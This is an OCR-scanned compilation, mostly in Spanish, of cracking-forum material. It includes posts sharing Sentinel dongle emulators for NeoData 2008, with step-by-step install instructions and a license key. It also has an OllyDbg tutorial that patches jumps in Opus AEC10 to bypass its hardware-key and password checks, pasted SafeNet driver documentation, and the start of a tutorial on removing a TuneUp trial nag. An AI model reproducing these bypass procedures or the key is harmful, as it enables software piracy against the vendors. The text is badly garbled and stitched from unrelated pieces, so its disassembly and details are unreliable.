If everything works fine and you want to buy full version let us know as soon as possible to get 
disocunt. Just drop us e-mail to salesOdongleservice.com to receive payment details. 


Step 9. HASP dongle emulator doesn't work. 
There are many reasons because HASP dongle emulator doesn't work: 


e You didn't install HASP dongle emulator correctly; 


. Your application isn't 32-bit application and doesn't use low-level driver; 
. Dongle wasn't dumped properly; 
. Your program detects dongle emulator. 


Contact us at salesOdongleservice.com for troubleshooting. 
Step 10. Your program was updated, and HASP dongle emulator stopped working 


Usually it happens when dongle content is changed. Then you should start from Step 1 with only 
exception - all updates are free of charges if you're registered user of HASP dongle emulator. 


Questions 


If you need additional information or want to ask some questions - feel free to send us e-mail to 


salestdongleservice.com. 


Updated 09-Apr-2008 
(c)neoBit.org 1998-2008 


PERO HAY UNO QUE CIRCULA EN LA RED, ES FIXEADO POR EDGE, ME | MAGI NO QUE ES EL QUE ESTAS USANDO DEBE 


FUNCIONARTE. O EN CASO CONTRARI O VERIFICA TU EQUIPO SI NO TINE VIRUS. (TE RECOMIENDO KASPERKY 2009) 


Hola a todos. 

Aqui les adjunto otro emulador para neodata2008 con los mismos datos del anterior. 

Para que lo prueben los que tinen problemas con el actual y comenten si les soluciono el tema de los 10 minutos. 
12 Detener servicio y desinstalar driver en Emulador SCT SENTEMUL2007.exe. 

22 Ejecutar | nstalar_neodata2008.bat para instalar el nuevo Emulador. 

Si se quiere desinstalar ejecutar Remove.bat. 


he comprobado que la version neodata 2009 no se comunica con el emulador. 
por lo que solo esta en formato DEMO. 


Saludos [E] 


Archivos adjuntos 


3 Emulador Sentinel para Neodata2008.rar (169.9 KB, 87 vistas) 


Gracias mca 20720 

Asi rapidicimo y de primera mano, hice exactamente lo que comentas arriba y sas que dice la che.... maquina "Nuevo 
HardWare detectado" 

y me manda al Asistente para la nueva instalacion del HardWare, intente dos cosas: 

1. Que el Asistente buscara automaticamente el controlador. 

y fallo. 

2. Le puse que yo lo seleccionaria de una lista y le puse que el controlador estaba en la carpeta que nos mandaste 

y pues tambien que falla. 


y ya al ultimo dice, su HardWare no se instalo correctamente es posible que no funsione.......... PPPppprrrrrrr!!!!! 


Alguna Recomendacion Mil gracias. Luv) 

Gracias de todos modos a todos por el apoyo. 

AAAAhhhhh 

otra cosa, alguien me puede decir si se puede emular otro candado, ya que cuento con almenos el numero de serie y clave de 
un cadado real para el neo 2008 y de hecho puedo tener acceso a dicho candado fisico de vez en cuando, je cuando me lo 
prestan. 


mil gracias. 


bueno yo no tuve problemas para instalar y desinstalar, ambas opciones corrieron perfectamente pero en realidad no hubo 
ningun cambio, a los 10 minutos regreso a version demo. bah! que envidia me dan a los que si les funciono. 8-P 


Bueno pues este es mi primer aporte. 
Les cuento yo baje el emulador modificado para el SCT y efectivamente funcionaperfecto hasta los 10 min. y despues ya saben 
la historia. 


EEE EE 
SES)» mi me sirvio esto y lo subi a Rapid... para que lo chequen (es el emulador del tal MEZCALERO) HS) 


SANATAS RESPONDE 


Gracias por el aporte, creo que si el error solo lo da el emulador es por que en la carpeta de "C:1 Neow20081 Sentinel 
Driverni Sentinel Pro Neti " deven existir los siguientes archivos: 


e  sentinel.bat 
e  NeoData.dng 
e  Emulador_SCT.exe 


ahora aqui se los dejo como deven estar configurados el sentinel.bat: 


C:1 Neow20081 Sentinel Driven Sentinel Pro 
Neti Emulador_SCT.exe NeoData.dng 


Recuerden que la ruta la pueden cambiar a donde este instalado el neodata. 
De cualquier manera qui les dejo los archivos de nuevo. 


Gracias RENAV, se te agradece igual la intencion, de hecho al leer tu post fue cuando decidi subirlo ya que 
este post de neodata tiene muchas vistas y respuestas. 


33 Sentinel Pro Net.rar (130.5 KB, 


Lo acabo de bajar y probar y me funciona llevo dos horas trabajandolo hasta el momento y esta OK gracias 
es un gran aporte, lo corri con la version neow2008 vr 9.10.429 que es la que esta en el portal del neodata 


Me informaron hoy de un problema que tiene el emulador en vista, les dice que ya expiro, aqui les dejo el 
nuevo emulador que corre en XP/VISTA/SERVER2003 


La tecnica es la misma que puse en el post anterior (no olviden renombrarlo para que coincida con el .bat). 
Por favor reportenme fallas para dejar mas pulidito el emulador. 

Ya se subio la descarga del neodata, talvez despues les hace falta: 

Me alegro que te funcionara, en verdad necesitabba saber si a alguien le funcionaba el emulador aparte de 
ami, ya que desde que lo puse no me ha dado ningun problema ni alos 5 ni 10 minutos, ahora solo falta que 


alguien me confirme que le este funcionando el emulador que subi para Vista. 


Respecto alo de matrices, si esta permitido, pero haganlo en la seccion correspondiente, que seria en este 
caso: 


1: Sanatas Cracker Team ::. >.:: Varios ::. > Profesionistas 


y ngenieria Civil y Arquitectura 


Link directo: 


Archivos adjuntos 


338 Emulador_SCTvista.rar (129.8 KB, 139 vistas) 


Maestro SANATAS, y obvio a Backdoor, X-suprem, y todos aquellos que intervinieron en el desarrollo de este 


me tarde en dar las, jajaja gracias, por que hasta hoy acabe de descargar el programa de Neodata 2008 
Posteado para descargas aqui mismo (Muchas Gracias MAESTRO SANATAS POR SUBIRLO) 
Resulto que SI YA LLEVO TRABAJANDO MAS DE 1 HORA Y SI DIO RESULTADO. 


Para los que estuvieron perdidos al igual que yo hay les va lo que hice yo: 


1. - Desinstalé todos los sentinelas del Neodata, con el SSDCLEANUP ubicado en la carpeta 
NEOW/2008/SENTINEL DRIVER/ SSDCleanup. 

2.- Posterior desinstale el driver de la pestaña DRIVER del Emulador_SCT. 

3.- Elimine todos los emuladores de SCT y el del che Mezcalero, de mi pc. 

4.- DESINSTALE EL NEODATA,, (BUENO TODDOS LOS NEODATAS ANTERIORES TAMBIEN). 

5.- REINICIE LA PC. 

6.- INSTALE LA VERSION DE NEODATA 2008 ligada aqui por el mestro SANATAS para descarga, Que viene 
en 4 partes. (lo descomprimes en wrar y hasta eso solito se complemento en uno solo pesa en total 345mb, 
y si te fijas el mas nuevo pesa 353 mb.) 

7.- REINICIE LA PC. 

8.- COPIE EN LA CARPETA NEOW2008/SENTINEL DRIVER 

LOS 3 ARCHIVOS: 

EMULADOR_SCT NeoData. DNG Y SENTINEL (archivos por lotes ms-dos) 

9.- esta demas pero tambien copie el archivo senitnel en la carpeta NEOW2008/ (ahi suelto no mas por si las 
moscas verdad jajaja). 

10.- ENCIENDO EL EMULADOR "EMULADOR_SCT" Y SIGO EL PROCEDIMIENTO: 

-PESTAÑA DRIVER INSTALAR, OPCION GUARDAR ESTADO 

-PESTAÑA EMULADOR en EMPEZAR SERVICIO. 

-PESTAÑA DONGLES cargar Archivo y CARGAS EL ARCHIVO NeoData 

-PESTAÑA EMULADOR otra vez pero ahora das en actualizar licencia. 

11.- LISTO CIERRA EL EMULADOR Y REINICIA LA PC. 

12.- ABRE EL PROGRAMA DE NEODATA 2008 Y TE PIDE LA CLAVE 


INSERTAS LA CLAVE 4579175148 Y LisssssssssTIA 


EMPIEZA A TRABAJAR...... y DURA MAS DE 10 MIN JAJAJJJ AJAJAJA. 


DE NUEVO MIL GRACIAS TEACHERSSSSSSSS. 
p.D. disculpen que me aya explayado tanto pero espero que este mini tuto le sirva a las personas que 


anduvieron como yo frustradas. 
a tambien si lo permite el mestro SANATAS podemos compartir matrices como dicen aya arriba, (pero 
dejemos en claro que este es un foro de CRACKERS y le debo respeto sas) 


Ahora apenas me acabo de enterar cual es el problema con el emulador y el neodata 2009, lo que pasa es 
que el neodata 2009 necesita otro hardware lock distinto al que tenemos actualmente, si tu candado es usb 
morado, sentinel paralelo (obviamente no funciona con la version 2008), tienes que cambiar tu hardware 
lock, los hijos de su tiznada madre de neodata te cambian por 500 pesos tu hardware lock(si tienes todavia 
vigente el año de actualizaciones "GRATUITAS"), si actualizas el software a la version 2009 te incluye el 
cambio de hardware lock, y si tu llave es paralela el costo del cambio es de 1200. Asi que pues hay que 
investigar primero que tipo de llave es la que utiliza, debe ser de la misma familia de sentinel me imagino 
yo, y ver si se puede hacer un dump. 


Saludos, resulta que tengo mi llave del 2009, comprada a Neodata, estuve medio investigando y hablando a 
neodata, (porque antes teniamos licencias del 2008 y me dijeron que me cambiarian mi llave), ahora bien 
segun lei en la red con la llave ya podria crear el dump y segun yo de esta manera podria crear un 
emulador.. 

O alguien que me explique? 


Algo mas, Pelibuey, a lo mejor te pasa lo mismo que a mi, checa que quede prendido en automatico el 
sentinel driver y NO, no tienes que ocupar ninguno de los archivos de la carpeta sentinel que se instalan con 
el neodata. 


Y como van con el emulador para el neodata 2009? 


Falta que alguién done la dongle emulada .dng que sea validad para la versión 2009, el emulador sería el 
mismo que se utiliza para la versión 2008. Si tienes y cuentas con la llave fisica (candado/Sentinel) sería 
cuestión de que la clonaras nada mas y compartieras el archivo .dng 


Que tal.. buen día a todos... 

Desde hace como 6 o 7 años comenze a estudiar Ing. en Sistemas tengo referencias del los compas rooy y 
sanatas y tambien se me hace muy sonado el nick de riatanaz por compaspel.... Por cierto no pase del 
segundo semetre y ya llebaba arrastrando la asignatura de algoritmos... En ese entonces no muy me 
intereseba el software y deserte... pero si el hardware ingrese a Mecatronica... otro fracaso. 


Al día volvi a Ingresar a la Lic en Sistemas y ya hasta excento de algoritmos estoy Bra entiendo mejor la 
informatica y me gusta mucho más... Por eso hasta ahora me anime a registrarme y participar. Tengo 
mucho que agradecer al SCT y a cualquiera no mencionado por sus a. con el trabajo y la 


escuela tengo menos tiempo que antes pero si tengo la intención... 
viendo... 


y asi que por aqui nos estaremos 


muy largo saludo pero a lo que venia.... 

Tengo un cliente que tiene la membresia anual de servicios de neodata, que actualizaciones sin costo o el 
otro.. etc. Y ciertamente ya tenia el dongle del 2008, descargo el 2009 y le enviaron el serial y nada despues 
de instalar el 2009 le salia directamente la version demostrativa... asi que me llamo y empezamos a checar 
e investigando volvi a dar con esta agradable compañia... por cierto el emulador que mejor funciono fue el 
de SCT (crei que era el vista el problematico... quizás...).. Y después de tanta prueba efectivamente 
concluimos que el 2009, NO FUNCIONA CON EL DONGLE DEL 2008. Terminaron cambiandole el dongle a mi 
cliente por uno nuevo "Sentinel pronet dual" y a la primera jalo... 


He querido hacer pruebas con el 2009 pero no me deja extraer el *.dng. El del 2008 facilmente lo consegui 
con el Edgespro pero con este me marca error algo asi como Can't load AP!I.... 

El dumper de donglebackup.com facilmente volca el dongle pero es igual hay que extraerle el *.dng y asi si 
ni idea.. ellos encomiendan enviarles el archivo dump y de regreso "tendriamos" el emulador pero ni idea de 


eso (por supuesto no es gratis)... 

Por el momento es todo platicamos luego y por supuestro Gracias por todos sus aportes 

Mandame el dump que sacaste de donglebackup.com, dices que si lo dumpeo correctamente y sin errores 
verdad. 


pd: Ya se por que se te hace facil ahora sistemas, es por que primero escogiste Ingenieria y Luego 
Licenciatura, hay un mundo de diferencia. 


Que bien que SCT te ayude en alguna parte de tus estudios, ya almenos en lo estimulante que es esto del 
hack € crack.... Bienvenido 


P.D. El emulador SCT no solo fue modificado en aspecto, tambien lo termine de crackear porque no era 
completamente libre y es por eso que fallaba en Vista. 


Tutorial Crack Opus AEC10 Revisión 21-06-2008 
DarkSide darkside(Araza-mexicana.org 


Opus AECT1O0 el software mexicano de ingeniería de costos más utilizado en el mundo, 
evoluciona y nos sirve para lo siguiente: 


Presupuestos basados en precios unitarios. 

Cuantificación y números generadores. 

Planeación y programación de actividades de obra. 
Licitaciones para obra pública o privada. 

Control de pagos (estimaciones y escalatorias). 
Administración de subcontratos y destajos. 

Manejo de almacén de obras (entradas y salidas) 

Recepción de requisiciones, cotización y surtido de materiales. 


Este programa cuenta con una protección Sentinel UltraPro Usb. 


Mochila o dongle en inglés es un pequeño dispositivo hardware que se conecta a un ordenador, 
normalmente, para autenticar un fragmento de software. Cuando la mochila no está conectada, 
dicho software se ejecuta en un modo restringido o directamente no se ejecuta. Las mochilas son 
usadas por algunos fabricantes de software como forma de prevención de copias o gestión de 
derechos digitales pues es mucho más difícil copiar la mochila que el software que ésta 
autentica. Generalmente las mochilas se conectan por USB o puerto paralelo 

Este tipo de dispositivos son usados frecuentemente en programas muy costosos y en software 
de nicho, como aplicaciones CAD, gestión de hospitales o impresión digital. 

En algunos casos la mochila está codificada con una clave de licencia específica por usuario, 
que determina qué características estarán habilitadas en el programa destino. Esta es una forma 
de licenciamiento muy controlado ya que permite al proveedor que su cliente dependa de sus 
servicios. ( Rainbow Technologies ) 


Ya que hemos visto alguna información referente a la protección con la que cuenta nuestro 
programa que vamos analizar, empezaremos. 


Lo primero, abrimos el archivo opusw.exe en el ollydbg, lo dejamos correr y ver que pasa. 


Q No se ha encontrado la llave de protección o se intenta rebasar el límite de licencias permitido. 


El mensaje de error al no encontrar la pastilla. sin cerrar el mensaje ponemos un breackpoint en 
destroywindow de user32. 


Buscamos la dll USER32.DLL, la seleccionamos y damos click derecho y "view names" o solo 
CTRL+N, nos aparecerá una ventana donde están las funciones de USER32, no será necesario 
estar buscando el bpx, solo empiezan a teclear el nombre de la api a la que quieren poner el bpx, 
en este caso teclearemos "destroywindow" y solo ira filtrando entre las demás apis, pulsamos F2 
para poner el bpx en la api. 


Names in user32 


de leretleraFi le 

DeleteObject 
DeregisterShe | [Hook indow 
DER 00s leratorTable 


DialogBox IndirectParamA 

¡DialogBoxIndirectParamAorkl 

DialogBox IndireotParanmil 
ParanA 


v 


Ya que hemos hecho lo anterior volvemos al programa y cerramos la ventana no deseada, 
automáticamente saltara el bpx que pusimos en USER32 en el olly, ahora quitamos el bpx y 
pulsamos CTRL+F9 para correr la aplicación hasta el próximo RET (esto viene siendo el fin de 
esa CALL) ya que llegamos al RET pulsamos F8 para salir de esa CALL, si aun no caemos en 
el modulo que estamos crackeando (programa) hacemos lo mismo CTRL+F9 y F8, así hasta 
llegar al modulo del programa o alguna dll del mismo programa, cuando llegamos a este 
modulo lo en la instrucción de arriba de donde llegaste debe ser una CALL que es la que mando 
destruir la ventana, de aquí en adelante usamos el sentido común, es decir si arriba no hay un 
salto condicional que salte esa call, pues trazaremos hasta salir de esa call y ver lo que hay 
afuera de ella, esto es "trazando hacia atrás", un ejemplo muy sencillo de lo que nos podemos 
encontrar llegando a un modulo del programa seria que arriba de la CALL que manda destruir la 
ventana estuviera un salto condicional que nos enviara líneas abajo de esa dll y caer en el call 
que mando el error. 


. $9 POP ECX ¿ 
ES 97ECFFFF [CALL opusw. 00402358 i 
68 CCC95809 |PUSH opusw. 0BSSCICC ¿ (a 31 = B9S58CICC 
ES SDAFOADO |CALL_opusw.00S6EBS3 ' Opu sw. DOSCEBSS 
59 POP ECX a 
. 68 20610009 |PUSH 120 ; Arg2 = 0940120 
. 6A 00 PUSH 9 A (555 - 69000000 
ES 7030FFFF |CALL opusw.004B6C4D ¡ opus. 004B6C4D 
8304 es ADD ESP, 8 : 
5] PUSH EAX : | es91 
. ES 6730FFFF | CALL su. 004B6C40 - opusw. 004B6C4D 
8304 08 ADD ESP.S 
MOU DWORD PTR $5: LEBP-193, ER 


. 8945 FO 
. pa B4FEFFFF! LEA E ROD PTR SS: [EBP-14: 


. 68 983C5909 |PUSH opusu. 00593098 
. ES AS CALL Po yb 


Aquí esta la llegada de un salto condicional 
de mas arriba 


4109009 | PUSH ¿ 
8080 B4FEFFFF| LEAR ECX, DWORD PTR SS: (EBP-1403 
PUSH ECX ¿ 
ES CBEDFFFF | CALL equ DOIarOS 
os ADD ESP, S 
PUSH ERX 
. 68 F£CSs8009 |PUSH opusw. 00SSCSF8 


63 F2C85800 |PUSH_opusw.00SSCSF2 : 
MOU EAX, DWORD PTR SS: (EBP-10; 


JN C3CSF 

mo HOÓ E, DWORD PTR $$: (EBP+91! 

S2 PUSH EOX ¡ Arg1 

. ES 8F270800 |CALL opusu.005463E8 opus. 00S463E8 
$9 POP ECX ! 


:vES 95000009 | JMP opusw.004C49F4 
> ES 8037FSFF ¡CALL opusu.004473E4 


Vamos a seguir de donde viene ese salto, y llegar hasta el origen, aquí esta la imagen de lo que 
nos da seguir el origen de ese salto. 


8 


e 


opusu 
L 


E 
PA] 


¿8 


00552688 
DWORD PTR SS: [EBP-2 


ES 


PUSH 
MOU 
ADO 
CAL 
TES 
JE 
CAL 
cap 
JNZ 
LEA 
PUSH 
PUSH 
PUSH 


an 
E | 
; 


sE 
E 
A 


Did 1 
R_SS: (EBP-23,574F i 


A Este salto es el que lleva al error y 
ETR_SS1 [EBP-2J,594F checamos que viene de otro mas arriba 
Que es el que vamos a nonear para que no 
PTR_SS: [EBP-2J, 484F - realice el salto 

PTR_SS: [EBP-21,4144 E 
PTR SS: [EBP-2], 4349 


E 
3 


EE 


ESE 
a 
E 


38 
, 


38 
có 


$89 


ES 

A O A 
css 
a 


$ 


E 


5 

SE 

se 
$ 


a 
E 


< 


iS 


de 36 e” 
2308 
3 
gl 


ne 


« 


Seg 


59 


, DWORD PTR SS: [EBP-3F0) 


Lo volvemos a correr con un bpx en el salto 00552430, y al saltar el olly nopearemos esa 
dirección ya que no queremos que salte jamás. 


Ahora nos sale que metamos el número del candado o algo así. 


No. de llave de seguridad : 


Clave NEO : | 
Cancelar | Ayuda 


Usaremos la misma técnica de destroywindow, ponemos el bpx y después le damos aceptar. 


y La Clave de Entrada a OPUS OLE es incorrecta 


Nos saldrá esta ventana de que la clave es incorrecta, le damos aceptar y nos saltara el bpx que 
hemos puesto en el olly, y de la misma forma iremos a donde nos esta mandando el error. 


8508 TEST_ERX, ERX 
v75 OF JNZ SHORT opusu. 
- 8855 es MOU EOX,OWORO PTR SS: (EBP+8) : 
- S2 PUSH EOX Argl 
. ES 8F270900 [CALL opusw. 005463E8 opusu. POST63ES 
8 LES | 
.” i 
> CALL Esta call es la encargada de llamar la forma 


: para la clave del opus 


Esta call simplemente nos saca del sistema 


después de comprobar la clave 


Veamos si modificando el salto 004C3C66 al convertir en jmp, nos saltamos definitivamente el 
mensaje de la ventana de que la clave es incorrecta. 


FUE UN ÉXITO, SI SE PUEDE!!!. 


Pero aun no terminamos, ya que cuando abrimos una obra nos vuelve a dar el mensaje de error. 


Pero, volvemos a hacer la técnica de destroytwindow, y volvemos a caer cerca de donde 
hicimos la primera modificación. y vemos que hay un salto que debería estar saltando y no lo 
esta haciendo, el salto lo vamos a convertir en jmp 


r 
$ 


3 o 
- 
82 


¿ 
8 


m 


SOS 
$ 


» t0t 


5 


p 
4 


2 
5 


opus. DOSSZ60C 
TR $: (Eb 0), Convertirlo a JMP 


3 


[E = 000001F4 


; 
Pe 


33? 
á 
E 


2 
E 
E 
Ñ 


ECX, DWORD PTR SS: [EBP-1FCI E: 
arg2 


. $1 PUSH ECX 

. 68 DIG00000 [PUSH 601 

: ES SOB2FÉFF [CALL opusw.004B28FD 

: 8304 0C FOD ESP, ec 

. 8085 O4FEFFFF LEA ERX, DWORD PTR SS: [EBP=1FC) 

: 8095 O4FEFFFF LEA EOX, DWORD PTR 55: [EBP-1FC) 

. 6A FF PUSH -1 

. $9 PUSH ERX 

: $ PUSH EOX 

: ES OSEAFEFF [CALL opusw.004C10CC 

. 8304 6C ñOD ESP, ec 

. $9 PUSH EARX 

. 68 00 PUSH 6 

. 6A 09 PUSH 0 

. ES BUIMFFFF [CALL opusw. 00545834 

. 8304 10 ROD ESP, 109 

: ES SL2FFSFF [CALL opusw.004A5600 

5 Ba 6l MOU AL. 1 

. 885 MOU ESP, EBP i 

: SD POP EEP > 

3 RETN - 
$0 MOP E 


Volvemos a correrlo y funciona bien, ya abre las obras y podemos crear también. 


poto 1 ESAOPUSAEC1OVOBRASMWLUDGESMLUDGES Hoja de Presupuesto 
xi 


OPUS 


OPUS-Red Revisión: 21-06-2008 
Número de serie: OX-10-1354-84 


Software de 
he Ingeniería de Costos, 


Programación, 
Control de Obras 


Este articulo es basando al tutorial realizado por Sanatas, 
que pertenece al grupo Sanatas Cracker Team y al cual le doy gracias. 


El tutorial que realizo Sanatas es sobre la Revisión 11-09-2006, yo solamente analicé los datos 
que daban referencia y los expuse para poder llevarlos acabo en la ultima Revisión 21-06-2008. 


Solamente falta encontrar las varias de las partes en donde les autoriza mandar a imprimir, que 
por cierto, ya no les va a salir la ventana de clave para imprimir ya que el salto que modificamos 
para el principio es el mismo call que usa en esa forma. 


de acceso a impresión: 


Por favor proporcione su número 


Ayuda 


Número de Serie: OX-10-1354-84 


Número de Acceso: | 


Así que solo nos saldrá clave invalida. 


Q El número de acceso es incorrecto. 


Hasta aquí Sanatas dejo el tutorial para que uno mismo fuera buscando los obstáculos que tiene 
el programa en algunas de sus opciones y no solamente a esperar a que nos dieran el crack. 


Estas son unas de los obstáculos que quedaron pendientes. 


Backdoor_b mando en el foro un reporte de bugs referentes al crack que habían realizado, para 
exponer los obstáculos que todavía estaban al momento de estar trabajando con el programa. 


En la Opción de "Ejecución", por ejemplo "Lista de Escalatorias" o "Lista de Estimaciones" 
sale una ventana de Dialogo donde pide la clave NEM. 


OPUS Control 


No. de llave de seguridad : (X La Clave de Entrada al módulo 11 de OPUS OLE es incorrecta 


Clave NEM : [| 
Cancelar | Ayuda 


y al ponerle cualquier cosa pues nos manda un mensaje que dice "La entrada al Modulo II de 
Opus Ole es incorrecta" y no nos deja entrar. 

Otro detalle de lo más importante es que cuando ya llevas una cierta cantidad de Datos 
introducidos en cualquier obra, en determinado momento no te deja agregar mas conceptos y 
manda la 2 siguientes ventanas una después de aceptar la primera. 


A Si no coloca adecuadamente la llave de protección, el programa será abortado, 


Q No se ha encontrado la llave de protección o se intenta rebasar el límite de licencias permitido, 


Aceptar 


Estas ventanas ya no te saldrán mas, ya que en alguna parte ya realizamos una modificación que 
nos salta esta rutina. 


Solamente vayan a Obra, abrir, buscar obra, y en el directorio de opusaec10 en el directorio de 
Obras les debe aparecer "Ejemplo Opus" y pues la seleccionan y eso es todo, escojan la sección 
de Catálogos y traten de añadir Materiales, o cualquier cosa y verán lo que les digo. 


Los primeros pasos del tutorial les seran de gran ayuda para poder encontrar estos obstáculos al 
querer trabajar con el programa control.exe, ya que trae las mismas secuencias al iniciar. 


OPUS Control 


A No se ha encontrado la llave de protección. 


OPUS Control 


OPUS Control 
No. de llave de seguridad : 


Clave NEM : [res] A La Clave de Entrada a CONTROL es incorrecta 
Cancelar | Ayuda 


Ya es solo cuestión de cada uno para poder seguir los pasos que se han dejado anteriormente 
para continuar buscando los obstáculos y poder ir aprendiendo poco a poco. 


Espero que les sean de utilidad esta información para que vayan aprendiendo y no solamente 
esperar a que personas terceras realicen un crack para poder pedirlo y perder ese momento de 
poder aprender nuevas cosas uno mismo al estar buscando e invetigando. 


Mando un cordial saludo a los integrantes del Grupo Sanatas Cracker Team y todos los grupos y 
personas que dan un tiempo para dar a conocer algunos tips o trucos al sacar tutoriales y 
manuales donde paso a paso van dando esas explicaciones que ayudan mucho a todas estas 
personas que van aprendiendo, ya que uno nunca nace sabiendo. 


REFERENCIAS 


http://ecosoft.com.mx 


http://www.sanatas.com/vb 


Proteccion : Sentinel Protection Installer 7.3.0 Revisión 2006 


112 Sentinel Protection Installer 7.3.0 - InstallShield Wizard 


Custom Setup S t 7 / 


ect the program feat u want installed, Protection Installer 


Click on an icon in the list below to change how a Feature is installed, 


Feature Description 


The device driver for Sentinel 
keys, 


Xx »| Sentinel Protection Server 


This feature requires OKB on 
your hard drive. It has 1 of 2 
subfeatures selected, The 
subfeatures require 466KB on 
your hard drive. 


Install to: 


C: Archivos de programa Archivos comunes|SafeNet Sentinel Sentinel System 
Driverl 


Installshield 


Los controladores del Sentinel de Opusw.exe se guardan en 
CiArchivos de programalArchivos comunes SafeNet Sentinel Sentinel System Driver 


Y SetupSysDriver sntnlusb 
— Y Configuration program Catálogo de seguridad 
SafeNet, Inc. 9 KB 


sntnlusb 
Información sobre la instalación 
3 KB 


sntnlusb sysdriver.quid 


Archivo de sistema Es3 Archivo GUID 
33 KB EA 1 KB 


Al abrir el ejecutable SetupSysDriver.exe veremos lo siguiente 


+ SetupSysDriver 


Add/Repair/Remove installation 
Configure Driver | 
Sentinel Syst 


Driver Configuration Utility 


Installed driver version 
| Wersion 7.73 for Windows 95/98/ME detected. 


About SetupSysDriver 


EN Sentinel System Driver Configuration Program v?.3.0 


Copyright[c)2006 SafeNet, Inc. All rights reserved. 


¡SetupSysDriver 


Add/Repair/Remove installation Driver Version 
" E Setup Utility Version 
; 


Fs VDD Version 
em onfiguration Utility 


Installed driver version 
Version 7.73 for Windows 95/98/ME detected. 


Copyright 2006 
All Rights Reserved. 


Sentinel Driver 


Ports 


Phusical Addr DOS 
Address Port Type Bus li Bus Type Space Addr Use? By 


378 Autodetect 


System 


Add Remove Edit DK Cancel Help About 


Add Port Add Port 


Use this port? ' 
Use this port? 


Bus Address: 


Bus Address: [_ox ] 
Bus Number: 

Bus Number: 
Bus Type: 

us Type: Bus Type: men 
Address Space: Add: S 
ress Space: 

Port Type a 


Port Type 


Autodetect Used? 
Autodetect Used? 


PS2/wDHA 
ECP — 
IBH AT LOW __Y 


Port Ownership Method: 
ÍV Auto 7 System JT Raise Priority 


Port Ownership Method: 
[Y Auto 7 System 7 Raise Priority 


Add Port 


Use this port? Yes C No 


Bus Address: po |] 


Bus Number: 
Bus Type: ISA] y] _Cancel | 
z 


Address Space: 120 Hel | 
Help 

Port Type IBH AT y] 

Autodetect Used? 5 


Port Ownership Method: 
[Y Auto ” System ” Raise Priority 


Acquisition Timeout (ms) 


Overview 
The Sentinel Driver provides access to the Sentinel keys for Windows NT applications. 


The Sentinel Driver is self-configuring, and for most systems does not require configuration 
by the user. However, if your system should require configuration, the process is outlined 
below. 


1. The Sentinel Driver locates all ports which are known to Windows NT and configures these 
ports automatically. These ports are shown as System ports. 


2. Ifa port does not exist in the Ports list or a system port has incorrect information, then a 
user-defined port can be defined. Most systems will not require a user-defined port. 


3. Each port, system or user-defined, has a usage field which can be set. The usage field is 
initialized to Yes. The usage field informs the Sentinel Driver whether or not to search the port 
for a Sentinel key. 


If the configuration requires further modification, enter the Control Panel and select Drivers to 
view the driver list. Select the Sentinel Driver from the driver list and then select the Setup 
button to display the Sentinel Driver Parallel Ports list window. 


Adding or Editing a Port 


User-defined ports can be added or edited. System defined ports can only have the use port 
field changed. 


To add a user-defined port, click on the Add button. To edit a port, user-defined or system, 
move the highlight bar to the port to edit and click on the Edit button. 


When adding a user-defined port, the Add Port window will appear with default values. 
When editing a port, the Configure Port window will appear with the current values for the port. 
If a system port is being edited, all fields except the usage field will be dimmed. Only the usage 
field may be modified for a system port. 


The configuration parameters are described below. 


The Use this port? field is a radio button selection. If Yes is selected, the Sentinel Driver will 
search this port for keys otherwise the port will not be searched for the Sentinel keys. The value 
for this field does not effect any other operation on this port. For example, printing can always 
occur to the parallel port regardless of the Use this port? field value. 


The Bus Address is computer dependent and for Intel machines is usually one of the 
hexadecimal values 3bc, 378 or 278. 


The Bus Number defaults to 0 and will generally not be modified. The list box allows 
selecting another Bus Number if necessary. 


The Bus Type allows selecting the computer bus type from the list box. Most Microsoft 
Windows NT capable machines are either ISA (Standard AT bus), MicroChannel (usually IBM 
PS/2s), or EISA. 


The Address Space defaults to 1/O and is generally not modified for parallel ports. 
The Port Type describes the parallel port as seen by the Sentinel Driver. 
Note! In most cases, you do not need to modify this setting. 


Autodetect - The Sentinel Driver automatically determines the port type. 

NEC (Japan) - This type of port is found on NEC systems built for the Japanese market. 

FMR (Japan) - This type of port is found on Fujitsu systems built for the Japanese 
market. 

IBM AT - This type of port is the AT-compatible port found on most systems. 

PS2 w/ DMA - This type of port supports DMA. Examples are Type 2 and Type 3 ports 
found on IBM PS/2 systems. 


ECP - This port type is provided for compatibility with.certain devices whose device drivers use 
ECP. 

IBM AT Low - This port type is provided for compatibility with. very low power. 
parallel ports. 


The Autodetect Used? Check Box indicates whether the Port Type setting shown is the result 
of autodetection or user configuration. A checked box means that the port type was determined 
by.autodetection. No check means that the port type was specified by the user. 


The Port Ownership Method specifies the method used to acquire ownership of the port. 
Note! In most cases, you do not need to modify this setting. 
Auto - This method directs the Sentinel Driver to use the method(s) that it determines 
to be best. Use this method unless you experience problems. 
System - This method uses the Windows NT port allocation feature 
(available in Windows NT version 3.5). 


Raise Priority - This method raises the priority of the process using the Sentinel Driver. 
The Acquisition Timeout specifies how long the Sentinel Driver will wait for the port if 1t is in 
use by another program. 
Following are valid entries for this field: 
0: Do not wait for the port if it is not available. 


Wait for the specified number of milliseconds to acquire the port. 
Wait as long as necessary to acquire the port. 


1 - 2,147,483,647: 
-1: 


If the configuration is changed, the driver will automatically be stopped and re-started for you. 
Removing a Port 
Only user-defined ports may be removed. 


To remove a port, move the highlight bar to the port to be removed and click on the Remove 
button. Since only user-defined ports can be removed, the Remove button is only active when 
the highlight bar is on a user-defined port otherwise the Remove button is dimmed. 


Teoría N* La primera del 2008 ya era hora 


Objetivo Aprender a Eliminar una NAG basándonos en la pila. 

Victima Tune up Programa para mantener el PC brillante 

Herramientas | 1 Depurador y un poco de Cabeza no vendrá nada mal saber algo sobre 
ASM. 


Dificultad Hazlo sin leer el tutorial y opina! Si te doy la Solución O. 


Compilador | Esta claro (Delphi). 


Cracker KmL ReVeRsEr 0 


RENUNCIA 


Este tutorial tiene una finalidad únicamente 


educativa, no asumo ninguna 


Responsabilidad por el mal uso que se le pueda dar a 
éste material. 


Bueno en este nuevo documento vamos a aprender como eliminar una nag con nada mas 
ver la pila y con un poco de cabeza caer encima del salto mágico. 
-No es magia es Ciencia OJO hay que practicar bastante. 


Comenzamos 
1-Examinamos el Programa. 
TuneUp Utitimes 2008 


¿2 TuneUp Utilities 2008 


Reco rd ato rio Ésta es una versión de prueba limitada de TuneUp Utilities, 
d ¡Sad b Puede probar todas las funciones del software durante 30 días 
e versión de prueba sin compromiso alguno. 


Una vez finalizado el periodo de prueba, si el software es de su 
agrado y desea seguir utilizándolo, basta con que haga clic en el 
botón Comprar ahora. 


CCOO 


Periodo de prueba: día 1 de 30 


